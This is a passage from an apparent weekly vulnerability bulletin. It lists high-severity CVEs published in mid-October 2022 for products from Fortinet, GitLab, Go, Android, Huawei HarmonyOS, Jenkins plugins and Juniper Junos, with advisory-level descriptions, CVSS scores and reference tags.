fortinet — fortitester An improper neutralization of special elements used in an OS command vulnerability [CWE-78] in the management interface of FortiTester 2.3.0 through 3.9.1, 4.0.0 through 4.2.0, 7.0.0 through 7.1.0 may allow an authenticated attacker to execute unauthorized commands via specifically crafted arguments to commands of the certificate import feature. 2022-10-18 7.2 CVE-2022-35844
CONFIRM
fujielectric — d300win Fuji Electric D300win prior to version 3.7.1.17 is vulnerable to a write-what-where condition, which could allow an attacker to overwrite program memory to manipulate the flow of information. 2022-10-19 9.1 CVE-2022-1523
CONFIRM
fujielectric — d300win Fuji Electric D300win prior to version 3.7.1.17 is vulnerable to an out-of-bounds read, which could allow an attacker to leak sensitive data from the process memory. 2022-10-19 7.5 CVE-2022-1738
CONFIRM
get-simple — getsimple_cms GetSimple CMS v3.3.16 was discovered to contain a remote code execution (RCE) vulnerability via the edited_file parameter in admin/theme-edit.php. 2022-10-18 9.8 CVE-2022-41544
MISC
gin-vue-admin_project — gin-vue-admin In “Gin-Vue-Admin”, versions v2.5.1 through v2.5.3b are vulnerable to Unrestricted File Upload that leads to execution of JavaScript code, through the “Compress Upload” functionality to the Media Library. When an admin user views the uploaded file, a low privilege attacker will get access to the admin’s cookie leading to account takeover. 2022-10-17 8 CVE-2022-32176
MISC
MISC
git-scm — git Git is an open source, scalable, distributed revision control system. `git shell` is a restricted login shell that can be used to implement Git’s push/pull functionality via SSH. In versions prior to 2.30.6, 2.31.5, 2.32.4, 2.33.5, 2.34.5, 2.35.5, 2.36.3, and 2.37.4, the function that splits the command arguments into an array improperly uses an `int` to represent the number of entries in the array, allowing a malicious actor to intentionally overflow the return value, leading to arbitrary heap writes. Because the resulting array is then passed to `execv()`, it is possible to leverage this attack to gain remote code execution on a victim machine. Note that a victim must first allow access to `git shell` as a login shell in order to be vulnerable to this attack. This problem is patched in versions 2.30.6, 2.31.5, 2.32.4, 2.33.5, 2.34.5, 2.35.5, 2.36.3, and 2.37.4 and users are advised to upgrade to the latest version. Disabling `git shell` access via remote logins is a viable short-term workaround. 2022-10-19 8.8 CVE-2022-39260
CONFIRM
gitea — gitea Gitea before 1.17.3 does not sanitize and escape refs in the git backend. Arguments to git commands are mishandled. 2022-10-16 9.8 CVE-2022-42968
MISC
MISC
github — enterprise_server A deserialization of untrusted data vulnerability was identified in GitHub Enterprise Server that could potentially lead to remote code execution on the SVNBridge. To exploit this vulnerability, an attacker would need to gain access via a server-side request forgery (SSRF) that would let an attacker control the data being deserialized. This vulnerability affected all versions of GitHub Enterprise Server prior to v3.6 and was fixed in versions 3.5.3, 3.4.6, 3.3.11, and 3.2.16. This vulnerability was reported via the GitHub Bug Bounty program. 2022-10-19 8.8 CVE-2022-23734
CONFIRM
CONFIRM
CONFIRM
CONFIRM
gitlab — gitlab A vulnerability in GitLab CE/EE affecting all versions from 11.3.4 prior to 15.1.5, 15.2 to 15.2.3, 15.3 to 15.3 to 15.3.1 allows an authenticated user to achieve remote code execution via the Import from GitHub API endpoint. 2022-10-17 9.9 CVE-2022-2884
MISC
CONFIRM
MISC
gitlab — gitlab A vulnerability in GitLab CE/EE affecting all versions from 11.10 prior to 15.1.6, 15.2 to 15.2.4, 15.3 to 15.3.2 allows an authenticated user to achieve remote code execution via the Import from GitHub API endpoint. 2022-10-17 8.8 CVE-2022-2992
CONFIRM
MISC
MISC
gitlab — gitlab An issue in Incident Timelines has been discovered in GitLab CE/EE affecting all versions starting from 14.9 before 15.1.6, all versions starting from 15.2 before 15.2.4, all versions starting from 15.3 before 15.3.2, which allowed an authenticated attacker to inject arbitrary content. A victim interacting with this content could lead to arbitrary requests. 2022-10-17 8 CVE-2022-2527
CONFIRM
MISC
MISC
gitlab — gitlab A potential DOS vulnerability was discovered in GitLab CE/EE affecting all versions before 15.1.6, all versions starting from 15.2 before 15.2.4, all versions starting from 15.3 before 15.3.2. Malformed content added to the issue description could have been used to trigger high CPU usage. 2022-10-17 7.5 CVE-2022-2931
MISC
CONFIRM
MISC
gitlab — gitlab An issue has been discovered in GitLab CE/EE affecting all versions before 15.1.6, all versions starting from 15.2 before 15.2.4, all versions starting from 15.3 before 15.3.2. It may be possible for an attacker to guess a user’s password by brute force by sending crafted requests to a specific endpoint, even if the victim user has 2FA enabled on their account. 2022-10-17 7.5 CVE-2022-3031
CONFIRM
MISC
gitlab — gitlab A potential DOS vulnerability was discovered in GitLab CE/EE affecting all versions before 15.2.5, all versions starting from 15.3 before 15.3.4, all versions starting from 15.4 before 15.4.1. Cloning an issue with specially crafted content added to the description could have been used to trigger high CPU usage. 2022-10-17 7.5 CVE-2022-3283
MISC
CONFIRM
MISC
gitlab — gitlab A potential DOS vulnerability was discovered in GitLab CE/EE affecting all versions from 10.8 before 15.1.6, all versions starting from 15.2 before 15.2.4, all versions starting from 15.3 before 15.3.2. Improper data handling on branch creation could have been used to trigger high CPU usage. 2022-10-21 7.5 CVE-2022-3639
MISC
CONFIRM
gitlab — gitlab An issue has been discovered in GitLab affecting all versions starting from 12.10 before 15.1.6, all versions starting from 15.2 before 15.2.4, all versions starting from 15.3 before 15.3.2. GitLab was not performing correct authentication with some Package Registries when IP address restrictions were configured, allowing an attacker already in possession of a valid Deploy Token to misuse it from any location. 2022-10-17 7.4 CVE-2022-2533
MISC
CONFIRM
gitlab — gitlab A crafted tag in the Jupyter Notebook viewer in GitLab EE/CE affecting all versions before 15.1.6, 15.2 to 15.2.4, and 15.3 to 15.3.2 allows an attacker to issue arbitrary HTTP requests 2022-10-17 7.3 CVE-2022-2428
CONFIRM
MISC
MISC
gitlab — gitlab Improper control of a resource identifier in Error Tracking in GitLab CE/EE affecting all versions from 12.7 allows an authenticated attacker to generate content which could cause a victim to make unintended arbitrary requests. 2022-10-17 7.3 CVE-2022-3060
MISC
MISC
CONFIRM
go-admin — go-admin go-admin (aka GO Admin) 2.0.12 uses the string go-admin as a production JWT key. 2022-10-17 9.8 CVE-2022-42980
MISC
golang — go Reader.Read does not set a limit on the maximum size of file headers. A maliciously crafted archive could cause Read to allocate unbounded amounts of memory, potentially causing resource exhaustion or panics. After fix, Reader.Read limits the maximum size of header blocks to 1 MiB. 2022-10-14 7.5 CVE-2022-2879
MISC
MISC
MISC
MISC
FEDORA
golang — go Requests forwarded by ReverseProxy include the raw query parameters from the inbound request, including unparseable parameters rejected by net/http. This could permit query parameter smuggling when a Go proxy forwards a parameter with an unparseable value. After fix, ReverseProxy sanitizes the query parameters in the forwarded query when the outbound request’s Form field is set after the ReverseProxy.Director function returns, indicating that the proxy has parsed the query parameters. Proxies which do not parse query parameters continue to forward the original query parameters unchanged. 2022-10-14 7.5 CVE-2022-2880
MISC
MISC
MISC
MISC
FEDORA
golang — go Programs which compile regular expressions from untrusted sources may be vulnerable to memory exhaustion or denial of service. The parsed regexp representation is linear in the size of the input, but in some cases the constant factor can be as high as 40,000, making relatively small regexps consume much larger amounts of memory. After fix, each regexp being parsed is limited to a 256 MB memory footprint. Regular expressions whose representation would use more space than that are rejected. Normal use of regular expressions is unaffected. 2022-10-14 7.5 CVE-2022-41715
MISC
MISC
MISC
MISC
FEDORA
golang — text An attacker may cause a denial of service by crafting an Accept-Language header which ParseAcceptLanguage will take significant time to parse. 2022-10-14 7.5 CVE-2022-32149
MISC
MISC
MISC
MISC
google — android In music service, there is a missing permission check. This could lead to elevation of privilege in contacts service with no additional execution privileges needed. 2022-10-14 7.8 CVE-2022-2985
MISC
google — android In soundrecorder service, there is a missing permission check. This could lead to elevation of privilege in contacts service with no additional execution privileges needed. 2022-10-14 7.8 CVE-2022-38669
MISC
google — android In soundrecorder service, there is a missing permission check. This could lead to elevation of privilege in contacts service with no additional execution privileges needed. 2022-10-14 7.8 CVE-2022-38670
MISC
google — android In messaging service, there is a missing permission check. This could lead to elevation of privilege in contacts service with no additional execution privileges needed. 2022-10-14 7.8 CVE-2022-38698
MISC
google — android In messaging service, there is a missing permission check. This could lead to elevation of privilege in contacts service with no additional execution privileges needed. 2022-10-14 7.8 CVE-2022-39080
MISC
google — android In Soundrecorder service, there is a missing permission check. This could lead to elevation of privilege in Soundrecorder service with no additional execution privileges needed. 2022-10-14 7.8 CVE-2022-39107
MISC
google — android In Music service, there is a missing permission check. This could lead to elevation of privilege in Music service with no additional execution privileges needed. 2022-10-14 7.8 CVE-2022-39108
MISC
google — android In Music service, there is a missing permission check. This could lead to elevation of privilege in Music service with no additional execution privileges needed. 2022-10-14 7.8 CVE-2022-39109
MISC
google — android In Music service, there is a missing permission check. This could lead to elevation of privilege in Music service with no additional execution privileges needed. 2022-10-14 7.8 CVE-2022-39110
MISC
google — android In Music service, there is a missing permission check. This could lead to elevation of privilege in Music service with no additional execution privileges needed. 2022-10-14 7.8 CVE-2022-39111
MISC
google — drive An attacker can pre-create the `/Applications/Google Drive.app/Contents/MacOS` directory which is expected to be owned by root to be owned by a non-root user. When the Drive for Desktop installer is run for the first time, it will place a binary in that directory with execute permissions and set its setuid bit. Since the attacker owns the directory, the attacker can replace the binary with a symlink, causing the installer to set the setuid bit on the symlink. When the symlink is executed, it will run with root permissions. We recommend upgrading past version 64.0. 2022-10-17 7.3 CVE-2022-3421
MISC
gpac — gpac GPAC 2.1-DEV-rev368-gfd054169b-master was discovered to contain a heap buffer overflow via the function gf_isom_box_dump_start_ex at /isomedia/box_funcs.c. 2022-10-19 7.8 CVE-2022-43040
MISC
gpac — gpac GPAC 2.1-DEV-rev368-gfd054169b-master was discovered to contain a heap buffer overflow via the function FixSDTPInTRAF at isomedia/isom_intern.c. 2022-10-19 7.8 CVE-2022-43042
MISC
gradle — enterprise A credential-exposure vulnerability in the support-bundle mechanism in Gradle Enterprise 2022.3 through 2022.3.3 allows remote attackers to access a subset of application data (e.g., cleartext credentials). This is fixed in 2022.3.3. 2022-10-21 7.5 CVE-2022-41575
MISC
MISC
gxgroup — gpon_ont_titanium_2122a_firmware An issue in GX Group GPON ONT Titanium 2122A T2122-V1.26EXL allows attackers to escalate privileges via a brute force attack at the login page. 2022-10-17 9.8 CVE-2022-40055
MISC
MISC
MISC
hiwin — robot_system_software HIWIN Robot System Software version 3.3.21.9869 does not properly address the terminated command source. As a result, an attacker could craft code to disconnect HRSS and the controller and cause a denial-of-service condition. 2022-10-17 7.5 CVE-2022-3382
MISC
huawei — harmonyos The HwAirlink module has a heap overflow vulnerability in processing data packets of the proprietary protocol. Successful exploitation of this vulnerability may allow attackers to obtain process control permissions. 2022-10-14 9.8 CVE-2022-38980
MISC
huawei — harmonyos The fingerprint module has service logic errors. Successful exploitation of this vulnerability will cause the phone lock to be cracked. 2022-10-14 9.8 CVE-2022-38982
MISC
huawei — harmonyos The BT Hfp Client module has a Use-After-Free (UAF) vulnerability. Successful exploitation of this vulnerability may result in arbitrary code execution. 2022-10-14 9.8 CVE-2022-38983
MISC
MISC
huawei — harmonyos The MPTCP module has an out-of-bounds write vulnerability. Successful exploitation of this vulnerability may cause root privilege escalation attacks implemented by modifying program information. 2022-10-14 9.8 CVE-2022-41578
MISC
MISC
huawei — harmonyos The HW_KEYMASTER module has a vulnerability of not verifying the data read. Successful exploitation of this vulnerability may cause malicious construction of data, which results in out-of-bounds access. 2022-10-14 9.8 CVE-2022-41580
MISC
MISC
huawei — harmonyos The HW_KEYMASTER module has a vulnerability of missing bounds check on length. Successful exploitation of this vulnerability may cause malicious construction of data, which results in out-of-bounds access. 2022-10-14 9.1 CVE-2021-46839
MISC
MISC
huawei — harmonyos The HW_KEYMASTER module has an out-of-bounds access vulnerability in parameter set verification. Successful exploitation of this vulnerability may cause malicious construction of data, which results in out-of-bounds access. 2022-10-14 9.1 CVE-2021-46840
MISC
MISC
huawei — harmonyos The HIPP module has a vulnerability of bypassing the check of the data transferred in the kernel space. Successful exploitation of this vulnerability may cause out-of-bounds access to the HIPP module and page table tampering, affecting device confidentiality and availability. 2022-10-14 9.1 CVE-2022-38986
MISC
MISC
huawei — harmonyos The HW_KEYMASTER module has a vulnerability of not verifying the data read. Successful exploitation of this vulnerability may cause malicious construction of data, which results in out-of-bounds access. 2022-10-14 9.1 CVE-2022-41581
MISC
MISC
huawei — harmonyos The kernel module has an out-of-bounds read vulnerability. Successful exploitation of this vulnerability may cause memory overwriting. 2022-10-14 7.8 CVE-2022-41584
MISC
MISC
huawei — harmonyos The kernel module has an out-of-bounds read vulnerability. Successful exploitation of this vulnerability may cause memory overwriting. 2022-10-14 7.8 CVE-2022-41585
MISC
MISC
huawei — harmonyos The HwAirlink module has a heap overflow vulnerability. Successful exploitation of this vulnerability may cause out-of-bounds writes, resulting in modification of sensitive data. 2022-10-14 7.5 CVE-2022-38977
MISC
huawei — harmonyos The HwAirlink module has an out-of-bounds read vulnerability. Successful exploitation of this vulnerability may cause information leakage. 2022-10-14 7.5 CVE-2022-38981
MISC
huawei — harmonyos The HIPP module has a vulnerability of not verifying the data transferred in the kernel space. Successful exploitation of this vulnerability will cause out-of-bounds read, which affects data confidentiality. 2022-10-14 7.5 CVE-2022-38984
MISC
MISC
huawei — harmonyos The facial recognition module has a vulnerability in input validation. Successful exploitation of this vulnerability may affect data confidentiality. 2022-10-14 7.5 CVE-2022-38985
MISC
MISC
huawei — harmonyos The HISP module has a vulnerability of not verifying the data transferred in the kernel space. Successful exploitation of this vulnerability will cause out-of-bounds read, which affects data confidentiality. 2022-10-14 7.5 CVE-2022-38998
MISC
MISC
huawei — harmonyos The HISP module has a vulnerability of bypassing the check of the data transferred in the kernel space. Successful exploitation of this vulnerability may cause unauthorized access to the HISP module. 2022-10-14 7.5 CVE-2022-39011
MISC
MISC
huawei — harmonyos The security module has configuration defects. Successful exploitation of this vulnerability may affect system availability. 2022-10-14 7.5 CVE-2022-41582
MISC
MISC
huawei — harmonyos The storage maintenance and debugging module has an array out-of-bounds read vulnerability. Successful exploitation of this vulnerability will cause incorrect statistics of this module. 2022-10-14 7.5 CVE-2022-41583
MISC
MISC
huawei — harmonyos The communication framework module has a vulnerability of not truncating data properly. Successful exploitation of this vulnerability may affect data confidentiality. 2022-10-14 7.5 CVE-2022-41586
MISC
MISC
huawei — harmonyos The home screen module has a vulnerability in service logic processing. Successful exploitation of this vulnerability may affect data integrity. 2022-10-14 7.5 CVE-2022-41588
MISC
MISC
huawei — harmonyos The DFX unwind stack module of the ArkCompiler has a vulnerability in interface calling. Successful exploitation of this vulnerability affects system services and device availability. 2022-10-14 7.5 CVE-2022-41589
MISC
MISC
ikea — tradfri_led1732g11_firmware An attacker sending a single malformed IEEE 802.15.4 (Zigbee) frame makes the TRÅDFRI bulb blink, and if they replay (i.e. resend) the same frame multiple times, the bulb performs a factory reset. This causes the bulb to lose configuration information about the Zigbee network and current brightness level. After this attack, all lights are on with full brightness, and a user cannot control the bulbs with either the IKEA Home Smart app or the TRÅDFRI remote control. The malformed Zigbee frame is an unauthenticated broadcast message, which means all vulnerable devices within radio range are affected. CVSS 3.1 Base Score 7.1 vector: CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H 2022-10-14 8.1 CVE-2022-39064
MISC
ikus-soft — rdiffweb Missing Authentication for Critical Function in GitHub repository ikus060/rdiffweb prior to 2.5.0a6. 2022-10-20 9.8 CVE-2022-3327
MISC
CONFIRM
iptime — nas1dual_firmware This vulnerability occurs in the user account creation and deletion related pages of IPTIME NAS products. The vulnerability could be exploited due to a lack of validation when a POST request is made to this page. An attacker can use this vulnerability to create or delete user accounts, or to escalate arbitrary user privileges. 2022-10-17 8.8 CVE-2022-23771
MISC
jasper_project — jasper A vulnerability was found in jasper. This security vulnerability happens because of a memory leak bug in function cmdopts_parse that can cause a crash or segmentation fault. 2022-10-14 7.5 CVE-2022-2963
MISC
MISC
MISC
jenkins — compuware_topaz_for_total_test Jenkins Compuware Topaz for Total Test Plugin 2.4.8 and earlier implements an agent/controller message that does not limit where it can be executed, allowing attackers able to control agent processes to read arbitrary files on the Jenkins controller file system. 2022-10-19 7.5 CVE-2022-43429
CONFIRM
MLIST
jenkins — compuware_topaz_for_total_test Jenkins Compuware Topaz for Total Test Plugin 2.4.8 and earlier does not configure its XML parser to prevent XML external entity (XXE) attacks. 2022-10-19 7.5 CVE-2022-43430
CONFIRM
MLIST
jenkins — groovy A sandbox bypass vulnerability involving various casts performed implicitly by the Groovy language runtime in Jenkins Pipeline: Groovy Plugin 2802.v5ea_628154b_c2 and earlier allows attackers with permission to define and run sandboxed scripts, including Pipelines, to bypass the sandbox protection and execute arbitrary code in the context of the Jenkins controller JVM. 2022-10-19 9.9 CVE-2022-43402
CONFIRM
MLIST
jenkins — groovy_libraries A sandbox bypass vulnerability in Jenkins Pipeline: Groovy Libraries Plugin 612.v84da_9c54906d and earlier allows attackers with permission to define untrusted Pipeline libraries and to define and run sandboxed scripts, including Pipelines, to bypass the sandbox protection and execute arbitrary code in the context of the Jenkins controller JVM. 2022-10-19 9.9 CVE-2022-43405
CONFIRM
MLIST
jenkins — input_step Jenkins Pipeline: Input Step Plugin 451.vf1a_a_4f405289 and earlier does not restrict or sanitize the optionally specified ID of the ‘input’ step, which is used for the URLs that process user interactions for the given ‘input’ step (proceed or abort) and is not correctly encoded, allowing attackers able to configure Pipelines to have Jenkins build URLs from ‘input’ step IDs that would bypass the CSRF protection of any target URL in Jenkins when the ‘input’ step is interacted with. 2022-10-19 8.8 CVE-2022-43407
CONFIRM
MLIST
jenkins — katalon Jenkins Katalon Plugin 1.0.32 and earlier implements an agent/controller message that does not limit where it can be executed and allows invoking Katalon with configurable arguments, allowing attackers able to control agent processes to invoke Katalon on the Jenkins controller with attacker-controlled version, install location, and arguments, and attackers additionally able to create files on the Jenkins controller (e.g., attackers with Item/Configure permission could archive artifacts) to invoke arbitrary OS commands. 2022-10-19 8.8 CVE-2022-43416
CONFIRM
MLIST
jenkins — mercurial Jenkins Mercurial Plugin 1251.va_b_121f184902 and earlier provides information about which jobs were triggered or scheduled for polling through its webhook endpoint, including jobs the user has no permission to access. 2022-10-19 7.5 CVE-2022-43410
CONFIRM
MLIST
jenkins — repo Jenkins REPO Plugin 1.15.0 and earlier does not configure its XML parser to prevent XML external entity (XXE) attacks. 2022-10-19 7.5 CVE-2022-43415
CONFIRM
MLIST
jenkins — script_security A sandbox bypass vulnerability involving casting an array-like value to an array type in Jenkins Script Security Plugin 1183.v774b_0b_0a_a_451 and earlier allows attackers with permission to define and run sandboxed scripts, including Pipelines, to bypass the sandbox protection and execute arbitrary code in the context of the Jenkins controller JVM. 2022-10-19 9.9 CVE-2022-43403
CONFIRM
MLIST
jenkins — script_security A sandbox bypass vulnerability involving crafted constructor bodies and calls to sandbox-generated synthetic constructors in Jenkins Script Security Plugin 1183.v774b_0b_0a_a_451 and earlier allows attackers with permission to define and run sandboxed scripts, including Pipelines, to bypass the sandbox protection and execute arbitrary code in the context of the Jenkins controller JVM. 2022-10-19 9.9 CVE-2022-43404
CONFIRM
MLIST
jenkins — script_security A sandbox bypass vulnerability involving various casts performed implicitly by the Groovy language runtime in Jenkins Script Security Plugin 1183.v774b_0b_0a_a_451 and earlier allows attackers with permission to define and run sandboxed scripts, including Pipelines, to bypass the sandbox protection and execute arbitrary code in the context of the Jenkins controller JVM. 2022-10-19 8.8 CVE-2022-43401
CONFIRM
MLIST
jhead_project — jhead Jhead 3.06.0.1 allows attackers to execute arbitrary OS commands by placing them in a JPEG filename and then using the regeneration -rgt50 option. 2022-10-17 7.8 CVE-2022-41751
MISC
MISC
MISC
jsonlint_project — jsonlint jsonlint 1.0 is vulnerable to heap-buffer-overflow via /home/hjsz/jsonlint/src/lexer. 2022-10-19 7.5 CVE-2022-42227
MISC
juniper — junos An Improper Input Validation vulnerability in the J-Web component of Juniper Networks Junos OS may allow an unauthenticated attacker to access data without proper authorization. Utilizing a crafted POST request, deserialization may occur which could lead to unauthorized local file access or the ability to execute arbitrary commands. This issue affects Juniper Networks Junos OS: all versions prior to 19.1R3-S9; 19.2 versions prior to 19.2R3-S6; 19.3 versions prior to 19.3R3-S7; 19.4 versions prior to 19.4R2-S7, 19.4R3-S9; 20.1 versions prior to 20.1R3-S5; 20.2 versions prior to 20.2R3-S5; 20.3 versions prior to 20.3R3-S5; 20.4 versions prior to 20.4R3-S4; 21.1 versions prior to 21.1R3-S2; 21.2 versions prior to 21.2R3-S1; 21.3 versions prior to 21.3R2-S2, 21.3R3; 21.4 versions prior to 21.4R1-S2, 21.4R2-S1, 21.4R3; 22.1 versions prior to 22.1R1-S1, 22.1R2. 2022-10-18 9.8 CVE-2022-22241
CONFIRM
juniper — junos A PHP Local File Inclusion (LFI) vulnerability in the J-Web component of Juniper Networks Junos OS may allow a low-privileged authenticated attacker to execute an untrusted PHP file. By chaining this vulnerability with other unspecified vulnerabilities, and by circumventing existing attack requirements, successful exploitation could lead to a complete system compromise. This issue affects Juniper Networks Junos OS: all versions prior to 19.1R3-S9; 19.2 versions prior to 19.2R3-S6; 19.3 versions prior to 19.3R3-S6; 19.4 versions prior to 19.4R2-S7, 19.4R3-S8; 20.1 versions prior to 20.1R3-S5; 20.2 versions prior to 20.2R3-S5; 20.3 versions prior to 20.3R3-S5; 20.4 versions prior to 20.4R3-S4; 21.1 versions prior to 21.1R3-S2; 21.2 versions prior to 21.2R3-S1; 21.3 versions prior to 21.3R2-S2, 21.3R3; 21.4 versions prior to 21.4R1-S2, 21.4R2-S1, 21.4R3; 22.1 versions prior to 22.1R1-S1, 22.1R2. 2022-10-18 8.8 CVE-2022-22246
CONFIRM
juniper — junos On cSRX Series devices software permission issues in the container filesystem and stored files combined with storing passwords in a recoverable format in Juniper Networks Junos OS allows a local, low-privileged attacker to elevate their permissions to take control of any instance of a cSRX software deployment. This issue affects Juniper Networks Junos OS 20.2 version 20.2R1 and later versions prior to 21.2R1 on cSRX Series. 2022-10-18 7.8 CVE-2022-22251
CONFIRM
juniper — junos An Improper Validation of Specified Index, Position, or Offset in Input vulnerability in the Packet Forwarding Engine (PFE) of Juniper Networks Junos OS allows an unauthenticated network-based attacker to cause a Denial of Service (DoS). On SRX5000 Series with SPC3, SRX4000 Series, and vSRX, when PowerMode IPsec is configured and a malformed ESP packet matching an established IPsec tunnel is received the PFE crashes. This issue affects Juniper Networks Junos OS on SRX5000 Series with SPC3, SRX4000 Series, and vSRX: All versions prior to 19.4R2-S6, 19.4R3-S7; 20.1 versions prior to 20.1R3-S3; 20.2 versions prior to 20.2R3-S4; 20.3 versions prior to 20.3R3-S3; 20.4 versions prior to 20.4R3-S2; 21.1 versions prior to 21.1R3; 21.2 versions prior to 21.2R3; 21.3 versions prior to 21.3R1-S2, 21.3R2. 2022-10-18 7.5 CVE-2022-22201
CONFIRM
juniper — junos On SRX Series devices, an Improper Check for Unusual or Exceptional Conditions when using Certificate Management Protocol Version 2 (CMPv2) auto re-enrollment, allows a network-based, unauthenticated attacker to cause a Denial of Service (DoS) by crashing the pkid process. The pkid process cannot handle an unexpected response from the Certificate Authority (CA) server, leading to crash. A restart is required to restore services. This issue affects: Juniper Networks Junos OS on SRX Series: All versions prior to 19.1R3-S9; 19.2 versions prior to 19.2R3-S6; 19.3 versions prior to 19.3R3-S7; 19.4 versions prior to 19.4R3-S9; 20.2 versions prior to 20.2R3-S5; 20.3 versions prior to 20.3R3-S4; 20.4 versions prior to 20.4R3-S4; 21.1 versions prior to 21.1R3-S1; 21.2 versions prior to 21.2R3; 21.3 versions prior to 21.3R2; 21.4 versions prior to 21.4R2. 2022-10-18 7.5 CVE-2022-22218
CONFIRM
juniper — junos On QFX10000 Series devices using Juniper Networks Junos OS when configured as transit IP/MPLS penultimate hop popping (PHP) nodes with link aggregation group (LAG) interfaces, an Improper Validation of Specified Index, Position, or Offset in Input weakness allows an attacker sending certain IP packets to cause multiple interfaces in the LAG to detach causing a Denial of Service (DoS) condition. Continued receipt and processing of these packets will sustain the Denial of Service. This issue affects IPv4 and IPv6 packets. Packets of either type can cause and sustain the DoS event. These packets can be destined to the device or be transit packets. On devices such as the QFX10008 with line cards, line cards can be restarted to restore service. On devices such as the QFX10002 you can restart the PFE service, or reboot device to restore service. This issue affects: Juniper Networks Junos OS on QFX10000 Series: All versions prior to 15.1R7-S11; 18.4 versions prior to 18.4R2-S10, 18.4R3-S10; 19.1 versions prior to 19.1R3-S8; 19.2 versions prior to 19.2R3-S4; 19.3 versions prior to 19.3R3-S5; 19.4 versions prior to 19.4R2-S6, 19.4R3-S7; 20.1 versions prior to 20.1R3-S3; 20.2 versions prior to 20.2R3-S3; 20.3 versions prior to 20.3R3-S2; 20.4 versions prior to 20.4R3-S4; 21.1 versions prior to 21.1R3; 21.2 versions prior to 21.2R3-S3; 21.3 versions prior to 21.3R3-S1. 
An indicator of compromise may be seen by issuing the command:
request pfe execute target fpc0 command "show jspec pechip[3] registers ps l2_node 10" timeout 0 | refresh 1 | no-more
and reviewing for backpressured output; for example:
GOT: 0x220702a8 pe.ps.l2_node[10].pkt_cnt 00000076
GOT: 0x220702b4 pe.ps.l2_node[10].backpressured 00000002 <<<< STICKS HERE
and requesting detail on the pepic wanio:
request pfe execute target fpc0 command "show pepic 0 wanio-info" timeout 0 | no-more | match xe-0/0/0:2
GOT: 3 xe-0/0/0:2 10 6 3 0 1 10 189 10 0x6321b088 <<< LOOK HERE
as well as looking for tail drops looking at the interface queue, for example:
show interfaces queue xe-0/0/0:2
resulting in:
Transmitted: Total-dropped packets: 1094137 0 pps << LOOK HERE
2022-10-18 7.5 CVE-2022-22223
CONFIRM
juniper — junos An Improper Validation of Specified Type of Input vulnerability in the routing protocol daemon (rpd) of Juniper Networks Junos OS allows an attacker to cause an RPD memory leak leading to a Denial of Service (DoS). This memory leak only occurs when the attacker’s packets are destined to any configured IPv6 address on the device. This issue affects: Juniper Networks Junos OS 21.1 versions prior to 21.1R3-S2; 21.2 versions prior to 21.2R3-S1; 21.3 versions prior to 21.3R3; 21.4 versions prior to 21.4R2; 22.1 versions prior to 22.1R2. This issue does not affect Juniper Networks Junos OS versions prior to 21.1R1. 2022-10-18 7.5 CVE-2022-22228
CONFIRM
juniper — junos An Unchecked Return Value to NULL Pointer Dereference vulnerability in Packet Forwarding Engine (PFE) of Juniper Networks Junos OS allows an unauthenticated, network-based attacker to cause a Denial of Service (DoS). On SRX Series if Unified Threat Management (UTM) Enhanced Content Filtering (CF) and AntiVirus (AV) are enabled together and the system processes specific valid transit traffic the Packet Forwarding Engine (PFE) will crash and restart. This issue affects Juniper Networks Junos OS 21.4 versions prior to 21.4R1-S2, 21.4R2 on SRX Series. This issue does not affect Juniper Networks Junos OS versions prior to 21.4R1. 2022-10-18 7.5 CVE-2022-22231
CONFIRM
juniper — junos A NULL Pointer Dereference vulnerability in the Packet Forwarding Engine of Juniper Networks Junos OS on SRX Series allows an unauthenticated, network-based attacker to cause a Denial of Service (DoS). On SRX Series, if Unified Threat Management (UTM) Enhanced Content Filtering (CF) is enabled and specific transit traffic is processed, the PFE will crash and restart. This issue affects Juniper Networks Junos OS: 21.4 versions prior to 21.4R1-S2, 21.4R2 on SRX Series; 22.1 versions prior to 22.1R1-S1, 22.1R2 on SRX Series. This issue does not affect Juniper Networks Junos OS versions prior to 21.4R1. 2022-10-18 7.5 CVE-2022-22232
CONFIRM
juniper — junos An Improper Check for Unusual or Exceptional Conditions vulnerability in the Packet Forwarding Engine (PFE) of Juniper Networks Junos OS on SRX Series allows an unauthenticated, network-based attacker to cause Denial of Service (DoS). A PFE crash will happen when a GPRS Tunnel Protocol (GTP) packet is received with a malformed field in the IP header of GTP encapsulated General Packet Radio Services (GPRS) traffic. The packet needs to match existing state which is outside the attacker’s control, so the issue cannot be directly exploited. The issue will only be observed when endpoint address validation is enabled. This issue affects Juniper Networks Junos OS on SRX Series: 20.2 versions prior to 20.2R3-S5; 20.3 versions prior to 20.3R3-S4; 20.4 versions prior to 20.4R3-S3; 21.1 versions prior to 21.1R3-S2; 21.2 versions prior to 21.2R3-S1; 21.3 versions prior to 21.3R3; 21.4 versions prior to 21.4R1-S2, 21.4R2; 22.1 versions prior to 22.1R1-S1, 22.1R2. This issue does not affect Juniper Networks Junos OS versions prior to 20.2R1. 2022-10-18 7.5 CVE-2022-22235
CONFIRM
juniper — junos An Access of Uninitialized Pointer vulnerability in SIP Application Layer Gateway (ALG) of Juniper Networks Junos OS on SRX Series and MX Series allows an unauthenticated, network-based attacker to cause a Denial of Service (DoS). When specific valid SIP packets are received the PFE will crash and restart. This issue affects Juniper Networks Junos OS on SRX Series and MX Series: 20.4 versions prior to 20.4R3-S4; 21.1 versions prior to 21.1R3-S2; 21.2 versions prior to 21.2R3-S2; 21.3 versions prior to 21.3R2-S2, 21.3R3; 21.4 versions prior to 21.4R1-S2, 21.4R2; 22.1 versions prior to 22.1R1-S1, 22.1R2. This issue does not affect Juniper Networks Junos OS versions prior to 20.4R1. 2022-10-18 7.5 CVE-2022-22236
CONFIRM
juniper — junos_os_evolved An Execution with Unnecessary Privileges vulnerability in Management Daemon (mgd) of Juniper Networks Junos OS Evolved allows a locally authenticated attacker with low privileges to escalate their privileges on the device and potentially remote systems. This vulnerability allows a locally authenticated attacker with access to the ssh operational command to escalate their privileges on the system to root, or if there is user interaction on the local device to potentially escalate privileges on a remote system to root. This issue affects Juniper Networks Junos OS Evolved: All versions prior to 20.4R3-S5-EVO; 21.1-EVO versions prior to 21.1R3-EVO; 21.2-EVO versions prior to 21.2R2-S1-EVO, 21.2R3-EVO; 21.3-EVO versions prior to 21.3R2-EVO. This issue does not affect Juniper Networks Junos OS. 2022-10-18 8.8 CVE-2022-22239
CONFIRM
